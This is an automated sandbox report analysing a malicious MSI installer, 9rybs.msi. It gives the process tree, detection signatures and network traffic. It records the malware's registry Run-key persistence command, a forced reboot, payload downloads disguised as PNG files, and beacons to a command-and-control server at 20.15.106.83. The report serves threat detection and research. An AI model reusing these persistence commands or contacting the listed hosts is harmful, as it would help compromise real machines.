Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
9rybs.msi

Overview

General Information

Sample name:9rybs.msi
Analysis ID:1486731
MD5:e39e03a8e95aec841d8ec9e1ab3d5706
SHA1:3d9812935a2413fea198c3b11bf48769385bb077
SHA256:7b67c71ae5aa24c92655d29e37896f639fa42fa79713b174c6a660f5c19e49a2
Tags:msi
Infos:

Detection

Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected suspicious sample
Machine Learning detection for dropped file
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Suspicious Program Location with Network Connections
Uses shutdown.exe to shutdown or reboot the system
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for available system drives (often done to infect USB drives)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Suspicious Execution of Shutdown
Sigma detected: Suspicious MsiExec Embedding Parent
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry

Classification

Process Tree

  • System is w10x64
  • msiexec.exe (PID: 5464 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\9rybs.msi" MD5: E5DA170027542E25EDE42FC54C929077)
  • msiexec.exe (PID: 3148 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 7176 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 25DA5FC2F3AC90E0630AA0C19D390DBD MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • cmd.exe (PID: 7408 cmdline: "C:\Windows\System32\cmd.exe" /C start /MIN reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v PeFIvJrY /t reg_sz /d "C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 7464 cmdline: reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v PeFIvJrY /t reg_sz /d "C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
          • conhost.exe (PID: 7472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • shutdown.exe (PID: 7620 cmdline: "C:\Windows\SysWOW64\shutdown.exe" /r /f /t 15 MD5: FCDE5AF99B82AE6137FB90C7571D40C3)
        • conhost.exe (PID: 7632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • PeFIvJrY.exe (PID: 7820 cmdline: "C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe" MD5: 65CD1FFDB524F091FC06884DCB1270F9)
  • PeFIvJrY.exe (PID: 7896 cmdline: "C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe" MD5: 65CD1FFDB524F091FC06884DCB1270F9)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Execution from Suspicious Folder
Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe" , CommandLine: "C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe, NewProcessName: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe, OriginalFileName: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: "C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe" , ProcessId: 7820, ProcessName: PeFIvJrY.exe
Sigma detected: New RUN Key Pointing to Suspicious Folder
Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 7464, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PeFIvJrY
Sigma detected: Suspicious Program Location with Network Connections
Source: Network ConnectionAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: DesusertionIp: 20.15.106.83, DesusertionIsIpv6: false, DesusertionPort: 80, EventID: 3, Image: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe, Initiated: true, ProcessId: 7820, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 49712
Sigma detected: CurrentVersion Autorun Keys Modification
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 7464, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PeFIvJrY
Sigma detected: Direct Autorun Keys Modification
Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v PeFIvJrY /t reg_sz /d "C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe", CommandLine: reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v PeFIvJrY /t reg_sz /d "C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C start /MIN reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v PeFIvJrY /t reg_sz /d "C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7408, ParentProcessName: cmd.exe, ProcessCommandLine: reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v PeFIvJrY /t reg_sz /d "C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe", ProcessId: 7464, ProcessName: reg.exe
Sigma detected: Msiexec Initiated Connection
Source: Network ConnectionAuthor: frack113: Data: DesusertionIp: 188.114.97.3, DesusertionIsIpv6: false, DesusertionPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 7176, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 49706
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /C start /MIN reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v PeFIvJrY /t reg_sz /d "C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe", CommandLine: "C:\Windows\System32\cmd.exe" /C start /MIN reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v PeFIvJrY /t reg_sz /d "C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding 25DA5FC2F3AC90E0630AA0C19D390DBD, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 7176, ParentProcessName: msiexec.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C start /MIN reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v PeFIvJrY /t reg_sz /d "C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe", ProcessId: 7408, ProcessName: cmd.exe
Sigma detected: Suspicious Execution of Shutdown
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\SysWOW64\shutdown.exe" /r /f /t 15, CommandLine: "C:\Windows\SysWOW64\shutdown.exe" /r /f /t 15, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\shutdown.exe, NewProcessName: C:\Windows\SysWOW64\shutdown.exe, OriginalFileName: C:\Windows\SysWOW64\shutdown.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding 25DA5FC2F3AC90E0630AA0C19D390DBD, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 7176, ParentProcessName: msiexec.exe, ProcessCommandLine: "C:\Windows\SysWOW64\shutdown.exe" /r /f /t 15, ProcessId: 7620, ProcessName: shutdown.exe
Sigma detected: Suspicious MsiExec Embedding Parent
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\cmd.exe" /C start /MIN reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v PeFIvJrY /t reg_sz /d "C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe", CommandLine: "C:\Windows\System32\cmd.exe" /C start /MIN reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v PeFIvJrY /t reg_sz /d "C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding 25DA5FC2F3AC90E0630AA0C19D390DBD, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 7176, ParentProcessName: msiexec.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C start /MIN reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v PeFIvJrY /t reg_sz /d "C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe", ProcessId: 7408, ProcessName: cmd.exe

Snort Signatures

No Snort rule has matched

Suricata Signatures

Timestamp:2024-08-02T14:17:04.104879+0200
SID:2849814
Source Port:49710
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:2024-08-02T14:17:02.079215+0200
SID:2849814
Source Port:49710
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:2024-08-02T14:16:59.357207+0200
SID:2849814
Source Port:49710
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:2024-08-02T14:16:59.995709+0200
SID:2849814
Source Port:49710
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:2024-08-02T14:17:00.634854+0200
SID:2849814
Source Port:49710
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:2024-08-02T14:16:59.822396+0200
SID:2849814
Source Port:49710
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:2024-08-02T14:16:58.280053+0200
SID:2849814
Source Port:49710
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:2024-08-02T14:16:58.101078+0200
SID:2849814
Source Port:49710
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:2024-08-02T14:16:58.520069+0200
SID:2849814
Source Port:49710
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:2024-08-02T14:17:01.419059+0200
SID:2849814
Source Port:49710
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:2024-08-02T14:17:00.170890+0200
SID:2849814
Source Port:49710
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:2024-08-02T14:16:59.238977+0200
SID:2849814
Source Port:49710
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:2024-08-02T14:16:59.120820+0200
SID:2849814
Source Port:49710
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:2024-08-02T14:16:59.000829+0200
SID:2849814
Source Port:49710
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:2024-08-02T14:17:03.129170+0200
SID:2849814
Source Port:49710
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:2024-08-02T14:16:58.708055+0200
SID:2849814
Source Port:49710
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:2024-08-02T14:16:49.994894+0200
SID:2001683
Source Port:443
Destination Port:49707
Protocol:TCP
Classtype:Possibly Unwanted Program Detected
Timestamp:2024-08-02T14:16:58.400227+0200
SID:2849814
Source Port:49710
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:2024-08-02T14:17:05.217884+0200
SID:2849814
Source Port:49710
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:2024-08-02T14:17:03.799262+0200
SID:2849814
Source Port:49710
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:2024-08-02T14:17:01.767250+0200
SID:2849814
Source Port:49710
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:2024-08-02T14:17:02.779659+0200
SID:2849814
Source Port:49710
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:2024-08-02T14:16:58.828216+0200
SID:2849814
Source Port:49710
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:2024-08-02T14:17:03.624188+0200
SID:2849814
Source Port:49710
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:2024-08-02T14:17:00.515857+0200
SID:2849814
Source Port:49710
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:2024-08-02T14:16:59.646763+0200
SID:2849814
Source Port:49710
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:2024-08-02T14:17:00.929624+0200
SID:2849814
Source Port:49710
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:2024-08-02T14:16:49.899563+0200
SID:2001046
Source Port:443
Destination Port:49707
Protocol:TCP
Classtype:Misc activity
Timestamp:2024-08-02T14:17:00.344289+0200
SID:2849814
Source Port:49710
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:2024-08-02T14:17:00.753285+0200
SID:2849814
Source Port:49710
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:2024-08-02T14:17:02.435205+0200
SID:2849814
Source Port:49710
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:2024-08-02T14:17:03.447548+0200
SID:2849814
Source Port:49710
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:2024-08-02T14:17:03.975563+0200
SID:2849814
Source Port:49710
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:2024-08-02T14:17:02.955846+0200
SID:2849814
Source Port:49710
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:2024-08-02T14:17:01.105312+0200
SID:2849814
Source Port:49710
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:2024-08-02T14:17:01.591471+0200
SID:2849814
Source Port:49710
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:2024-08-02T14:16:59.476645+0200
SID:2849814
Source Port:49710
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:2024-08-02T14:17:02.607625+0200
SID:2849814
Source Port:49710
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:2024-08-02T14:16:48.126661+0200
SID:2001683
Source Port:443
Destination Port:49706
Protocol:TCP
Classtype:Possibly Unwanted Program Detected
Timestamp:2024-08-02T14:17:01.889631+0200
SID:2849814
Source Port:49710
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:2024-08-02T14:17:01.300206+0200
SID:2849814
Source Port:49710
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:2024-08-02T14:17:02.261195+0200
SID:2849814
Source Port:49710
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:2024-08-02T14:17:03.267318+0200
SID:2849814
Source Port:49710
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.1% probability
Machine Learning detection for dropped file
Source: C:\Users\Public\PeFI\vJrY\PeFI.pngJoe Sandbox ML: detected
Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.9:49706 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.9:49707 version: TLS 1.2
Source: Binary string: wininet.pdb source: shi64B2.tmp.3.dr
Source: Binary string: E:\B\T\d30760c8-f36a-4525-bc41-ffb9fa48b740\build\Win32\Release\mc-webview-cnt.pdb source: PeFIvJrY.exe, PeFIvJrY.exe, 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, PeFIvJrY.exe, 0000000D.00000002.1727643919.00000000003E1000.00000040.00000001.01000000.00000004.sdmp
Source: Binary string: C:\JobRelease\win\Release\bin\x86\embeddeduiproxy.pdb source: 9rybs.msi, 495fa1.msi.2.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\SoftwareDetector.pdb source: 9rybs.msi, MSI6487.tmp.2.dr, 495fa1.msi.2.dr
Source: Binary string: d3d12.pdbUGP source: shi6530.tmp.3.dr
Source: Binary string: d3d12.pdb source: shi6530.tmp.3.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\SoftwareDetector.pdb\ source: 9rybs.msi, MSI6487.tmp.2.dr, 495fa1.msi.2.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\InstallerAnalytics.pdbu source: 9rybs.msi, MSI6185.tmp.2.dr, MSI7033.tmp.2.dr, MSI9F25.tmp.2.dr, MSI6F17.tmp.2.dr, 495fa1.msi.2.dr, MSI6F47.tmp.2.dr
Source: Binary string: E:\B\T\d30760c8-f36a-4525-bc41-ffb9fa48b740\build\Win32\Release\mc-webview-cnt.pdbJ source: PeFIvJrY.exe, 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, PeFIvJrY.exe, 0000000D.00000002.1727643919.00000000003E1000.00000040.00000001.01000000.00000004.sdmp
Source: Binary string: wininet.pdbUGP source: shi64B2.tmp.3.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\InstallerAnalytics.pdb source: 9rybs.msi, MSI6185.tmp.2.dr, MSI7033.tmp.2.dr, MSI9F25.tmp.2.dr, MSI6F17.tmp.2.dr, 495fa1.msi.2.dr, MSI6F47.tmp.2.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: 9rybs.msi, MSI6467.tmp.2.dr, 495fa1.msi.2.dr, MSI635C.tmp.2.dr, MSI7003.tmp.2.dr, MSI62DE.tmp.2.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbg source: 9rybs.msi, MSI6467.tmp.2.dr, 495fa1.msi.2.dr, MSI635C.tmp.2.dr, MSI7003.tmp.2.dr, MSI62DE.tmp.2.dr
Source: C:\Windows\System32\msiexec.exeFile opened: z:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: x:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: v:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: t:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: r:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: p:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: n:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: l:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: j:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: h:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: f:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: b:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: y:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: w:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: u:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: s:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: q:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: o:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: m:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: k:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: i:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: g:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: e:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: c:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: a:Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeCode function: 12_2_0043303C FindFirstFileExW,12_2_0043303C
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeCode function: 12_2_00424DC6 FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,12_2_00424DC6
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeCode function: 12_2_00424DA6 FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,12_2_00424DA6
Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox ViewASN Name: MICROSOFT-CORP-MSN-AS-BLOCKUS MICROSOFT-CORP-MSN-AS-BLOCKUS
Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: global trafficHTTP traffic detected: GET /carol1.png HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: yznv.prefintions.pro
Source: global trafficHTTP traffic detected: GET /derrama.png HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: yznv.prefintions.pro
Source: unknownTCP traffic detected without corresponding DNS query: 20.15.106.83
Source: unknownTCP traffic detected without corresponding DNS query: 20.15.106.83
Source: unknownTCP traffic detected without corresponding DNS query: 20.15.106.83
Source: unknownTCP traffic detected without corresponding DNS query: 20.15.106.83
Source: unknownTCP traffic detected without corresponding DNS query: 20.15.106.83
Source: unknownTCP traffic detected without corresponding DNS query: 20.15.106.83
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /carol1.png HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: yznv.prefintions.pro
Source: global trafficHTTP traffic detected: GET /derrama.png HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: yznv.prefintions.pro
Source: global trafficHTTP traffic detected: GET /SCP/index.php?VS=VS3&PL=NAO HTTP/1.1User-Agent: "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.108 Safari/537.36"Host: 20.15.106.83Connection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: yznv.prefintions.pro
Source: global trafficDNS traffic detected: DNS query: collect.installeranalytics.com
Source: global trafficDNS traffic detected: DNS query: acons2020temix54.lisf
Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: application/x-www-form-urlencoded; charset=utf-8User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)Host: collect.installeranalytics.comContent-Length: 167Cache-Control: no-cache
Source: shi64B2.tmp.3.drString found in binary or memory: http://.css
Source: shi64B2.tmp.3.drString found in binary or memory: http://.jpg
Source: PeFIvJrY.exe, 0000000C.00000002.3847929255.00000000032FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.15.106.83
Source: PeFIvJrY.exe, 0000000C.00000002.3847929255.0000000003241000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.15.106.83/SCP/index.php
Source: PeFIvJrY.exe, 0000000C.00000002.3847929255.0000000003241000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.15.106.83/SCP/index.php?VS=VS3&PL=NAO
Source: 9rybs.msi, MSI6487.tmp.2.dr, MSI6185.tmp.2.dr, MSI7033.tmp.2.dr, MSI9F25.tmp.2.dr, MSI6F17.tmp.2.dr, MSI6467.tmp.2.dr, 495fa1.msi.2.dr, MSI635C.tmp.2.dr, MSI6F47.tmp.2.dr, MSI7003.tmp.2.dr, MSI62DE.tmp.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: vJrY.png.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: 9rybs.msi, MSI6487.tmp.2.dr, MSI6185.tmp.2.dr, MSI7033.tmp.2.dr, MSI9F25.tmp.2.dr, MSI6F17.tmp.2.dr, MSI6467.tmp.2.dr, 495fa1.msi.2.dr, MSI635C.tmp.2.dr, MSI6F47.tmp.2.dr, MSI7003.tmp.2.dr, MSI62DE.tmp.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: vJrY.png.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: vJrY.png.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: 9rybs.msi, MSI6185.tmp.2.dr, MSI7033.tmp.2.dr, MSI9F25.tmp.2.dr, MSI6F17.tmp.2.dr, 495fa1.msi.2.dr, MSI6F47.tmp.2.drString found in binary or memory: http://collect.installeranalytics.com
Source: vJrY.png.3.drString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
Source: vJrY.png.3.drString found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
Source: vJrY.png.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: 9rybs.msi, MSI6487.tmp.2.dr, MSI6185.tmp.2.dr, MSI7033.tmp.2.dr, MSI9F25.tmp.2.dr, MSI6F17.tmp.2.dr, MSI6467.tmp.2.dr, 495fa1.msi.2.dr, MSI635C.tmp.2.dr, MSI6F47.tmp.2.dr, MSI7003.tmp.2.dr, MSI62DE.tmp.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: vJrY.png.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: vJrY.png.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: 9rybs.msi, MSI6487.tmp.2.dr, MSI6185.tmp.2.dr, MSI7033.tmp.2.dr, MSI9F25.tmp.2.dr, MSI6F17.tmp.2.dr, MSI6467.tmp.2.dr, 495fa1.msi.2.dr, MSI635C.tmp.2.dr, MSI6F47.tmp.2.dr, MSI7003.tmp.2.dr, MSI62DE.tmp.2.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
